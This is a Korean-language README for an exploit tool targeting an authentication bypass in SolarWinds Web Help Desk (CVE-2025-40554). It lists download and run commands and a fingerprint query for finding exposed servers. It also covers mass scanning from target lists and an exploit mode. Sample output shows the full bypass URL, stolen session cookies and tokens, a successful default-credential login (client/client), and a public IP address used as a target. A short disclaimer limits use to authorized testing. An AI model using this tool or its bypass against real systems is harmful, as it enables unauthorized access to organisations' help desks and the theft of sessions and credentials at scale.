
CVE-2025-40554 익스플로잇
SolarWinds Web Help Desk의 인증 우회 취약점(CVE-2025-40554 / CVE-2025-40536)을 탐지하고 익스플로잇하기 위한 종합적인 보안 테스트 도구입니다.
교육 및 공인된 보안 테스트 목적으로만 사용
이 도구는 사용자가 소유하거나 명시적인 서면 허가를 받은 시스템에 대한 보안 연구, 침투 테스트, 취약점 평가를 위해 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 작성자는 이 도구의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.
CVE-2025-40554는 SolarWinds Web Help Desk의 인증 우회 취약점으로, 인증되지 않은 공격자가 다음을 수행할 수 있습니다:
직접 확인해보세요 :))
종속성:
# 스크립트 다운로드 또는 복제
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# 실행 권한 부여
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# 간단한 취약점 확인
python3 CVE-2025-40554.py -t https://target:8443
# 프로토콜 명시
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# 세션 열거를 포함한 완전한 익스플로잇
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# 기본 자격 증명 테스트 건너뛰기
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# 파일에서 여러 대상 스캔
python3 CVE-2025-40554.py -l targets.txt
# 익스플로잇과 함께 대량 스캔
python3 CVE-2025-40554.py -l targets.txt --exploit
# 조용한 모드 (최소 출력)
python3 CVE-2025-40554.py -l targets.txt -q
# 사용자 정의 출력 파일
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# 주석 지원
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ 인증 우회 익스플로잇 도구 ║
║ 연구 및 교육 목적으로만 사용 ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: 세션 설정...
[+] WOSID 추출됨: AbCdEfGhIjKlMnOpQrStU
[+] XSRF 토큰: abc123-def456-ghi789
[*] Step 2: 인증 우회 테스트...
[+] 우회 지표 발견: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] 취약함 - 인증 우회 확인됨!
[*] Step 3: 기본 자격 증명 테스트 (client/client)...
[+] 성공 - 기본 자격 증명 작동!
======================================================================
익스플로잇 모드 - CVE-2025-40554 인증 우회
======================================================================
[*] 우회 URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] 인증 우회 트리거...
[+] 인증 우회 성공!
[*] 세션 쿠키:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
요약
======================================================================
[+] 대상이 CVE-2025-40554에 취약함
[+] 기본 자격 증명: 작동
======================================================================
[*] targets.txt에서 5개의 고유 대상 로드됨
[*] 모드: 우회 + 기본 자격 증명 테스트
[*] 전체 익스플로잇 활성화됨
[1/5] https://target1:8443 테스트 중
[+] 취약함 - 인증 우회 확인됨!
[+] 성공 - 기본 자격 증명 작동!
[2/5] https://target2:8443 테스트 중
[!] 취약하지 않음 - 인증 우회 실패
...
======================================================================
스캔 요약
======================================================================
총 스캔: 5/5
취약함: 2
기본 자격 증명 작동: 1
======================================================================
[+] 결과가 vulnerable_targets.txt에 저장됨
세션 설정
인증 우회
자격 증명 테스트 (선택 사항)
전체 익스플로잇 (--exploit 모드)
도구는 다음을 확인하여 성공적인 우회를 탐지합니다:
externalAuthContainer - 외부 인증 구성JSONRpcClient - API 클라이언트 노출SAML 2.0 - SSO 구성LoginPref - 로그인 기본 설정authMode - 인증 모드 설정기여는 환영합니다.....
이 도구는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다. 사용에 따른 책임은 사용자 본인에게 있습니다.
Skynoxk
항상 윤리적이고 합법적으로 해킹하세요. 무단 접근은 범죄입니다.
| 옵션 | 설명 |
|---|
-t, --target URL | 테스트할 단일 대상 URL |
-l, --list FILE | 대상 목록을 포함한 파일 (한 줄에 하나씩) |
--exploit | 열거를 포함한 전체 익스플로잇 모드 활성화 |
--no-login | 기본 자격 증명 테스트 건너뛰기 |
-o, --output FILE | 취약한 대상에 대한 출력 파일 (기본값: vulnerable_targets.txt) |
-q, --quiet | 최소 출력 모드 (대량 스캔에 유용) |